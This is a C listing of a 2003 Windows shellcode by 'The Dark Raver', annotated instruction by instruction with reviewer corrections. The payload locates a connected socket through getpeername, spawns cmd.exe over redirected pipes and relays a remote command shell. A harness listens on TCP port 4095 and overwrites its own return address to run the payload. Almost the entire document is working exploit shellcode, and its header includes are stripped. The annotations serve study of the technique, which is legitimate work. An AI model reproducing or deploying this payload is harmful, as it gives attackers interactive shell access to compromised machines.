// The Dark Raver
// 28/03/2003
// 739 bytes
// PIPES + GETPEERNAME + CMD
// - Find API offsets
// - Without nulls
//
// NOTE(review): this listing is a 32-bit Windows payload kept in a C string
// plus a small harness (main/salta) that binds a TCP listener and jumps into
// the bytes.  Nothing here is buildable as-is: the six header names below
// were lost when the page was extracted (only the bare `#include` tokens
// survived), so restore them from the original source before compiling.
#include #include #include #include #include #include
void salta(void);
// Position-independent payload.  The C string is only a container for the
// bytes; the comments give the x86 instruction each literal encodes.  API
// addresses are resolved at run time (PEB walk + export-table scan), so no
// absolute address is embedded, and the API name table uses '0' as a
// separator that is patched to NUL at run time so the bytes contain no 0x00.
// Several of the author's original disassembly comments had wrong offsets;
// they have been corrected below to match the encoded bytes.
char hell[]=
// ---- Prologue ----
"\x55" /* push %ebp */
"\x89\xe5" /* mov %esp,%ebp */
"\x83\xec\x68" /* sub $0x68,%esp */
// ---- Building the API call table ----
// get_kernel_base:
// fs:0x30 is the PEB on 32-bit Windows; +0xc is PEB.Ldr, +0x1c the Flink of
// the initialization-order module list.  lodsd steps to the SECOND list entry
// and +0x8 reads its DllBase.  Assumes that entry is kernel32.dll, which is
// OS-version dependent (true on the Windows releases of the file's date).
"\x31\xd2" /* xor %edx,%edx */
"\xb2\x30" /* mov $0x30,%dl */
"\x64\x8b\x02" /* mov %fs:(%edx),%eax */
"\x8b\x40\x0c" /* mov 0xc(%eax),%eax */
"\x8b\x70\x1c" /* mov 0x1c(%eax),%esi */
"\xad" /* lods %ds:(%esi),%eax */
"\x8b\x40\x08" /* mov 0x8(%eax),%eax */
// kern_base in eax
"\x50" /* push %eax */
// get_getprocaddress:
// Walks the export directory (PE header at +0x3c, export table RVA at +0x78)
// and compares the first 8 bytes of every exported name against "GetProcA"
// (0x50746547 = "GetP", 0x41636f72 = "rocA" little-endian).  On a match the
// ordinal table (+0x24) and address table (+0x1c) give the function address.
"\x8b\xc8" /* mov %eax,%ecx */
"\x03\x40\x3c" /* add 0x3c(%eax),%eax */
"\x8b\x78\x78" /* mov 0x78(%eax),%edi */
"\x03\xf9" /* add %ecx,%edi */
"\x8b\x77\x20" /* mov 0x20(%edi),%esi */
"\x03\xf1" /* add %ecx,%esi */
"\x33\xd2" /* xor %edx,%edx */
"\x8b\x06" /* mov (%esi),%eax */
"\x03\xc1" /* add %ecx,%eax */
"\x81\x38\x47\x65\x74\x50" /* cmpl $0x50746547,(%eax) */
"\x75\x1e" /* jne +1e */
"\x81\x78\x04\x72\x6f\x63\x41" /* cmpl $0x41636f72,0x4(%eax) */
"\x75\x15" /* jne +15 */
"\x8b\x47\x24" /* mov 0x24(%edi),%eax */
"\x03\xc1" /* add %ecx,%eax */
"\x0f\xb7\x1c\x50" /* movzwl (%eax,%edx,2),%ebx */
"\x8b\x47\x1c" /* mov 0x1c(%edi),%eax */
"\x03\xc1" /* add %ecx,%eax */
"\x8b\x1c\x98" /* mov (%eax,%ebx,4),%ebx */
"\x01\xcb" /* add %ecx,%ebx */
"\xeb\x09" /* jmp +9 */
"\x83\xc6\x04" /* add $0x4,%esi */
"\x42" /* inc %edx */
"\x3b\x57\x18" /* cmp 0x18(%edi),%edx */ // 0x18 = NumberOfNames
"\x75\xcd" /* jne -32 */
// getprocaddress in ebx
// kernel_base in edi
"\x58" /* pop %eax */
"\x89\xc7" /* mov %eax,%edi */
// push &"CreateProcessA"
// jmp/call trick: the call pushes the address of the string that follows it.
"\xeb\x02" /* jmp +2 */
"\xeb\x13" /* jmp +(5+14) */
"\xe8\xf9\xff\xff\xff" /* call -7 */
"CreateProcessA" /* command string */
"\x5e" /* popl %esi */
"\x31\xd2" /* xor %edx,%edx */
// Terminates the string by writing a NUL over the byte right after it, i.e.
// the `pop %esi` (0x5e) that has already executed.
"\x88\x56\x0e" /* movb %dl,14(%esi) */
"\x56" /* push %esi */
"\x57" /* push %edi */
// CreateProcessA=GetProcAddress(kernel_base, "CreateProcessA")
// NOTE: API pointers are stored at POSITIVE offsets from %ebp, i.e. in the
// return-address/caller area above the 0x68-byte frame.  The payload never
// returns, so it does not care; a reader reconstructing the frame should.
"\xff\xd3" /* call *%ebx */
"\x89\x45\x04" /* mov %eax,0x04(%ebp) */
// push &"CreatePipe"
// The table below is 0x77 bytes; 0x77 + 5 (the call) = 0x7c.
"\xeb\x02" /* jmp +2 */
"\xeb\x7c" /* jmp +7C */
"\xe8\xf9\xff\xff\xff" /* call -7 */
// API Strings ('0' stands in for the NUL terminator until patched below)
"CreatePipe0"
"SetStdHandle0"
"DuplicateHandle0"
"PeekNamedPipe0"
"ReadFile0"
"WriteFile0"
"LoadLibraryA0"
"ws2_32.dll0"
"getpeername0"
"send0"
"recv0"
"\x5e" /* popl %esi */
// NULL API Strings: replace every '0' (0x30) in the table with 0x00.
// Scans indices 0x7f..1 (index 0 is never examined, and the scan runs a few
// bytes past the 0x77-byte table into code; none of those bytes is 0x30).
"\x31\xd2" /* xor %edx,%edx */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb1\x7f" /* mov $0x7f,%cl */
"\x80\x3c\x0e\x30" /* cmpb $0x30,(%esi,%ecx,1) */
"\x75\x03" /* jne +3 (skip store) */
"\x88\x14\x0e" /* mov %dl,(%esi,%ecx,1) */
"\xe2\xf5" /* loop (scan) */
"\x56" /* push %esi */
"\x57" /* push %edi */
// CreatePipe=GetProcAddress(kernel_base, "CreatePipe")
"\xff\xd3" /* call *%ebx */
"\x89\x45\x1C" /* mov %eax,0x1C(%ebp) */
// push &"SetStdHandle"   ("CreatePipe\0" is 11 = 0x0b bytes)
"\x83\xc6\x0b" /* add $0x0b,%esi */
"\x56" /* push %esi */
"\x57" /* push %edi */
// SetStdHandle=GetProcAddress(kernel_base, "SetStdHandle")
"\xff\xd3" /* call *%ebx */
"\x89\x45\x20" /* mov %eax,0x20(%ebp) */
// push &"DuplicateHandle"
"\x83\xc6\x0d" /* add $0x0d,%esi */
"\x56" /* push %esi */
"\x57" /* push %edi */
// DuplicateHandle=GetProcAddress(kernel_base, "DuplicateHandle")
"\xff\xd3" /* call *%ebx */
"\x89\x45\x28" /* mov %eax,0x28(%ebp) */
// push &"PeekNamedPipe"
"\x83\xc6\x10" /* add $0x10,%esi */
"\x56" /* push %esi */
"\x57" /* push %edi */
// PeekNamedPipe=GetProcAddress(kernel_base, "PeekNamedPipe")
"\xff\xd3" /* call *%ebx */
"\x89\x45\x3C" /* mov %eax,0x3C(%ebp) */
// push &"ReadFile"
"\x83\xc6\x0e" /* add $0x0e,%esi */
"\x56" /* push %esi */
"\x57" /* push %edi */
// ReadFile=GetProcAddress(kernel_base, "ReadFile")
"\xff\xd3" /* call *%ebx */
"\x89\x45\x40" /* mov %eax,0x40(%ebp) */
// push &"WriteFile"
"\x83\xc6\x09" /* add $0x09,%esi */
"\x56" /* push %esi */
"\x57" /* push %edi */
// WriteFile=GetProcAddress(kernel_base, "WriteFile")
"\xff\xd3" /* call *%ebx */
"\x89\x45\x4C" /* mov %eax,0x4C(%ebp) */
// push &"LoadLibraryA"
"\x83\xc6\x0a" /* add $0x0a,%esi */
"\x56" /* push %esi */
"\x57" /* push %edi */
// LoadLibraryA=GetProcAddress(kernel_base, "LoadLibraryA")
// The result stays in %eax and is called once below; it is never stored.
"\xff\xd3" /* call *%ebx */
// ws2_32.dll=LoadLibraryA("ws2_32.dll")
// push &"ws2_32.dll"
"\x83\xc6\x0d" /* add $0x0d,%esi */
"\x56" /* push %esi */
// call LoadLibraryA (address still in %eax)
"\xff\xd0" /* call *%eax */
// ws2_32.dll module handle in %edi (replaces kernel_base from here on)
"\x89\xc7" /* mov %eax,%edi */
// push &"getpeername"
"\x83\xc6\x0b" /* add $0x0b,%esi */
"\x56" /* push %esi */
"\x57" /* push %edi */
// getpeername=GetProcAddress(ws2_32.dll, "getpeername")
"\xff\xd3" /* call *%ebx */
"\x89\x45\x08" /* mov %eax,0x08(%ebp) */
// push &"send"
"\x83\xc6\x0c" /* add $0x0c,%esi */
"\x56" /* push %esi */
"\x57" /* push %edi */
// send=GetProcAddress(ws2_32.dll, "send")
"\xff\xd3" /* call *%ebx */
"\x89\x45\x44" /* mov %eax,0x44(%ebp) */
// push &"recv"
"\x83\xc6\x05" /* add $0x05,%esi */
"\x56" /* push %esi */
"\x57" /* push %edi */
// recv=GetProcAddress(ws2_32.dll, "recv")
"\xff\xd3" /* call *%ebx */
"\x89\x45\x48" /* mov %eax,0x48(%ebp) */
// -----------------------------------------
// Slot map, as actually written by the code above (the author's original
// table listed a few wrong slots and some stale absolute addresses that the
// code never uses):
// GetProcAddress  = %ebx (kept in a register, never stored)
// kernel_base     = %edi until the ws2_32.dll handle overwrites it
// CreateProcessA  = 0x04(%ebp)
// getpeername     = 0x08(%ebp)
// CreatePipe      = 0x1C(%ebp)
// SetStdHandle    = 0x20(%ebp)
// DuplicateHandle = 0x28(%ebp)
// PeekNamedPipe   = 0x3C(%ebp)
// ReadFile        = 0x40(%ebp)
// send            = 0x44(%ebp)
// recv            = 0x48(%ebp)
// WriteFile       = 0x4C(%ebp)
// LoadLibraryA    = returned in %eax, called once, not stored
// ws2_32.dll      = %edi (module handle)
// ---- Socket search ----
// Probes candidate handle values 4, 8, 12, ... with getpeername() until one
// returns 0, i.e. the first connected socket in this process.  Any socket
// that happens to be connected, not necessarily the harness's, will match.
"\x31\xdb" /* xor %ebx,%ebx */ // %ebx stays 0 and serves as the NULL/0 argument from here on
// x = 16;
// &x = 0xffffffe4(%ebp)
"\x89\x5d\xe4" /* mov %ebx,0xffffffe4(%ebp) */
"\xc6\x45\xe4\x10" /* movb $0x10,0xffffffe4(%ebp) */
// &serv_addr = 0xfffffde8(%ebp)   (well below the 0x68-byte frame, i.e. below %esp)
"\x31\xf6" /* xor %esi,%esi */
// loop
"\x83\xc6\x04" /* add $0x4,%esi */
// getpeername(i, (struct sockaddr *)&tdr, &x);
"\x8d\x45\xe4" /* lea 0xffffffe4(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x85\xe8\xfd\xff\xff" /* lea 0xfffffde8(%ebp),%eax */
"\x50" /* push %eax */
"\x56" /* push %esi */
// call getpeername = 0x08(%ebp)
"\x90\x90" /* (!!) Win32 ALIGN MADNESS */ // two nops; author's note, purpose not evident from the bytes
"\x8b\x45\x08" /* mov 0x08(%ebp),%eax */
"\xff\xd0" /* call *%eax */
"\x39\xc3" /* cmp %eax,%ebx */
"\x75\xe6" /* jnz loop */
// &hSock=0xffffffcc(%ebp)
"\x89\xb5\xcc\xff\xff\xff" /* mov %esi,0xffffffcc(%ebp) */
// ---- Creating and wiring up the handles ----
// SECURITY_ATTRIBUTES saAttr at 0xffffffd0(%ebp):
// saAttr.nLength = 12;
// saAttr.lpSecurityDescriptor = 0;
// saAttr.bInheritHandle = 1;
"\x31\xd2" /* xor %edx,%edx */
"\x83\xc2\x01" /* add $0x1,%edx */
"\x89\x55\xd8" /* mov %edx,0xffffffd8(%ebp) */
"\x83\xc2\x0b" /* add $0xb,%edx */
"\x89\x55\xd0" /* mov %edx,0xffffffd0(%ebp) */
"\x89\x5d\xd4" /* mov %ebx,0xffffffd4(%ebp) */
// CreatePipe(&hChildStdoutRd, &hChildStdoutWr, &saAttr, 0);
// Handle slots are disp8 offsets 0x50..0x6c, i.e. ABOVE %ebp (the author's
// comments wrote them as negative offsets; the encoded bytes are positive).
"\x53" /* push %ebx */
"\x8d\x45\xd0" /* lea 0xffffffd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x45\x50" /* lea 0x50(%ebp),%eax */ // &hChildStdoutWr
"\x50" /* push %eax */
"\x8d\x45\x58" /* lea 0x58(%ebp),%eax */ // &hChildStdoutRd
"\x50" /* push %eax */
// call CreatePipe = 0x1C(%ebp)
"\xff\x55\x1c" /* call *0x1c(%ebp) */
// SetStdHandle(-11, hChildStdoutWr);   (-11 = STD_OUTPUT_HANDLE)
"\x8b\x45\x50" /* mov 0x50(%ebp),%eax */
"\x50" /* push %eax */
"\x6a\xf5" /* push $0xfffffff5 */ // imm8 sign-extended to -11
// call SetStdHandle = 0x20(%ebp)
"\xff\x55\x20" /* call *0x20(%ebp) */
// DuplicateHandle(-1, hChildStdoutRd, -1, &hChildStdoutRdDup , 0, 0, 2);
// -1 = current-process pseudo-handle, 2 = DUPLICATE_SAME_ACCESS
"\x6a\x02" /* push $0x2 */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x8d\x45\x54" /* lea 0x54(%ebp),%eax */ // &hChildStdoutRdDup
"\x50" /* push %eax */
"\x68\xff\xff\xff\xff" /* push $0xffffffff */
"\x8b\x45\x58" /* mov 0x58(%ebp),%eax */
"\x50" /* push %eax */
"\x68\xff\xff\xff\xff" /* push $0xffffffff */
// call DuplicateHandle = 0x28(%ebp)
"\xff\x55\x28" /* call *0x28(%ebp) */
// CreatePipe(&hChildStdinRd, &hChildStdinWr, &saAttr, 0);
"\x53" /* push %ebx */
"\x8d\x45\xd0" /* lea 0xffffffd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x45\x68" /* lea 0x68(%ebp),%eax */ // &hChildStdinWr
"\x50" /* push %eax */
"\x8d\x45\x5c" /* lea 0x5c(%ebp),%eax */ // &hChildStdinRd
"\x50" /* push %eax */
// call CreatePipe = 0x1C(%ebp)
"\xff\x55\x1c" /* call *0x1c(%ebp) */
// SetStdHandle(-10, hChildStdinRd);   (-10 = STD_INPUT_HANDLE)
"\x8b\x45\x5c" /* mov 0x5c(%ebp),%eax */
"\x50" /* push %eax */
"\x6a\xf6" /* push $0xfffffff6 */
// call SetStdHandle = 0x20(%ebp)
"\xff\x55\x20" /* call *0x20(%ebp) */
// DuplicateHandle(-1, hChildStdinWr, -1, &hChildStdinWrDup, 0, 0, 2);
"\x6a\x02" /* push $0x2 */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x8d\x45\x6c" /* lea 0x6c(%ebp),%eax */ // &hChildStdinWrDup
"\x50" /* push %eax */
"\x68\xff\xff\xff\xff" /* push $0xffffffff */
"\x8b\x45\x68" /* mov 0x68(%ebp),%eax */
"\x50" /* push %eax */
"\x68\xff\xff\xff\xff" /* push $0xffffffff */
// call DuplicateHandle = 0x28(%ebp)
"\xff\x55\x28" /* call *0x28(%ebp) */
// ---- Launching cmd.exe ----
// memset(&piProcInfo, 0, 0x16);   (0x16 = 22 bytes; PROCESS_INFORMATION is 16)
// &piProcInfo=0xffffefb0(%ebp)
"\x8d\xbd\xb0\xef\xff\xff" /* lea 0xffffefb0(%ebp),%edi */
"\x88\xd8" /* mov %bl,%al */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb1\x16" /* mov $0x16,%cl */
"\xf3\xaa" /* rep stosb */
// memset(&siStartInfo, 0, 0x68);  (0x68 = 104 bytes; STARTUPINFOA is 68)
// &siStartInfo= 0xffffef60(%ebp)
"\x8d\xbd\x60\xef\xff\xff" /* lea 0xffffef60(%ebp),%edi */
"\x88\xd8" /* mov %bl,%al */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb1\x68" /* mov $0x68,%cl */
"\xf3\xaa" /* rep stosb */
// CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &siStartInfo, &piProcInfo);
// bInheritHandles = 1, so the child inherits the std handles set above.
// siStartInfo is all zero (no STARTF_USESTDHANDLES); the redirection relies
// solely on SetStdHandle having changed this process's own std handles.
"\x8d\x85\xb0\xef\xff\xff" /* lea 0xffffefb0(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x85\x60\xef\xff\xff" /* lea 0xffffef60(%ebp),%eax */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x6a\x01" /* push $0x1 */
"\x53" /* push %ebx */
"\x53" /* push %ebx */
// push &cmd.exe
"\xeb\x02" /* jmp +2 */
"\xeb\x0d" /* jmp +13 */
"\xe8\xf9\xff\xff\xff" /* call -7 */
// Not NUL-terminated: the command line runs on into the following code bytes
// up to the array's final NUL; presumably the trailing space is what makes
// CreateProcessA pick "cmd.exe" as the program token -- verify on target OS.
"cmd.exe\x20" /* command string */
"\x53" /* push %ebx */
// call CreateProcessA = 0x04(%ebp)
"\xff\x55\x04" /* call *0x04(%ebp) */
// ---- Relay loop between the socket and the pipe handles ----
// loop:
// Delay... (busy-wait: 0x10101010 iterations of `loop`)
"\xb9\x10\x10\x10\x10" /* mov $0x10101010,%ecx */
"\xe2\xfe" /* loop -2 */
// PeekNamedPipe(hChildStdoutRdDup, chBuf, 127, &dwRead, 0, 0);
// chBuf = 0xffffefd0(%ebp), dwRead = 0x60(%ebp)
"\x53" /* push %ebx */
"\x53" /* push %ebx */
"\x8d\x45\x60" /* lea 0x60(%ebp),%eax */
"\x50" /* push %eax */
"\x6a\x7f" /* push $0x7f */ // 127
"\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x45\x54" /* mov 0x54(%ebp),%eax */
"\x50" /* push %eax */
// call PeekNamedPipe = 0x3C(%ebp)
"\xff\x55\x3c" /* call *0x3C(%ebp) */
// if (dwRead <= 0) goto notif;   (signed compare)
"\x39\x5d\x60" /* cmp %ebx,0x60(%ebp) */
"\x7e\x2d" /* jle notif */
// ReadFile(hChildStdoutRdDup, chBuf, 127, &dwRead, 0);
"\x53" /* push %ebx */
"\x8d\x45\x60" /* lea 0x60(%ebp),%eax */
"\x50" /* push %eax */
"\x6a\x7f" /* push $0x7f */
"\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x45\x54" /* mov 0x54(%ebp),%eax */
"\x50" /* push %eax */
// call ReadFile = 0x40(%ebp)
"\xff\x55\x40" /* call *0x40(%ebp) */
// send(hSock, chBuf, dwRead, 0);
"\x53" /* push %ebx */
"\x8b\x45\x60" /* mov 0x60(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x85\xcc\xff\xff\xff" /* mov 0xffffffcc(%ebp),%eax */
"\x50" /* push %eax */
// call send = 0x44(%ebp)
"\xff\x55\x44" /* call *0x44(%ebp) */
"\xeb\xb1" /* jmp loop */
// notif:
// dwRead=recv(hSock, chBuf, 127, 0);   (blocking; a recv error of -1 is stored as dwRead unchecked)
"\x53" /* push %ebx */
"\x6a\x7f" /* push $0x7f */
"\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x85\xcc\xff\xff\xff" /* mov 0xffffffcc(%ebp),%eax */
"\x50" /* push %eax */
// call recv = 0x48(%ebp)
"\xff\x55\x48" /* call *0x48(%ebp) */
// dwRead = 0x60(%ebp)
"\x89\x45\x60" /* mov %eax,0x60(%ebp) */
// WriteFile(hChildStdinWrDup, chBuf, dwRead, &dwRead, 0);
"\x53" /* push %ebx */
"\x8d\x45\x60" /* lea 0x60(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x45\x60" /* mov 0x60(%ebp),%eax */
"\x50" /* push %eax */
"\x8d\x85\xd0\xef\xff\xff" /* lea 0xffffefd0(%ebp),%eax */
"\x50" /* push %eax */
"\x8b\x45\x6c" /* mov 0x6c(%ebp),%eax */
"\x50" /* push %eax */
// call WriteFile = 0x4C(%ebp)
"\xff\x55\x4C" /* call *0x4C(%ebp) */
// jmp loop  (no exit condition: the relay runs until the process dies)
"\xe9\x7e\xff\xff\xff" /* jmp loop */
"";
// TDR
// Test harness: opens a TCP listener on all interfaces, waits for ONE
// connection, prints the payload length, then transfers control to `hell`
// via salta().  The accepted socket is the one the payload's getpeername()
// scan is expected to find.  No Winsock return value is checked, and the
// function is declared DWORD but has no return statement (control is not
// expected to come back from salta()).
DWORD main(int argc, char *argv[]) {
 SOCKET hSock; SOCKET hDes; PROCESS_INFORMATION piProcInfo; STARTUPINFO siStartInfo; struct sockaddr_in serv_addr; WSADATA info; int x;
 LoadLibraryA("wsock32.dll");
 x = 16; // sizeof(struct sockaddr_in), passed to accept()
 WSAStartup(257, &info); // 257 = 0x0101, Winsock 1.1
 //hDes=WSASocket(2, 1, 0, 0, 0, 0);
 hDes=socket(2, 1, 6); // AF_INET, SOCK_STREAM, IPPROTO_TCP
 printf("%i\r\n", hDes);
 serv_addr.sin_family = 2; // AF_INET
 serv_addr.sin_port = 65295; // 4095 -- 0xFF0F in host order is port 0x0FFF = 4095 on the wire
 serv_addr.sin_addr.s_addr = 0; // INADDR_ANY: listens on every interface
 bind(hDes, (struct sockaddr *)&serv_addr, 16);
 listen(hDes, 5);
 hSock = accept(hDes, (struct sockaddr *)&serv_addr, &x);
 printf("%i\r\n", hSock);
 // strlen stops at the first NUL, so this doubles as a check that the
 // "Without nulls" claim in the header holds (expected: the 739 bytes above).
 // %d with a size_t argument is a format mismatch; harmless for a small value.
 printf("%d\n",strlen(hell));
 salta();
}
// Overwrites its own saved return address with &hell, so the `ret` at the
// end of this function lands in the payload instead of back in main().
// This is undefined behaviour that depends on the compiler's frame layout:
// it assumes `ret` is placed directly below the saved %ebp, so
// (int *)&ret + 2 is the return-address slot.  Expect it to work only with
// frame pointers kept and optimisation off, and only where the data
// segment holding `hell` is executable (a DEP/NX-enforced build would fault
// at the first payload instruction instead).
void salta(void) {
 int *ret;
 ret = (int *)&ret + 2;
 (*ret) = (int)hell;
}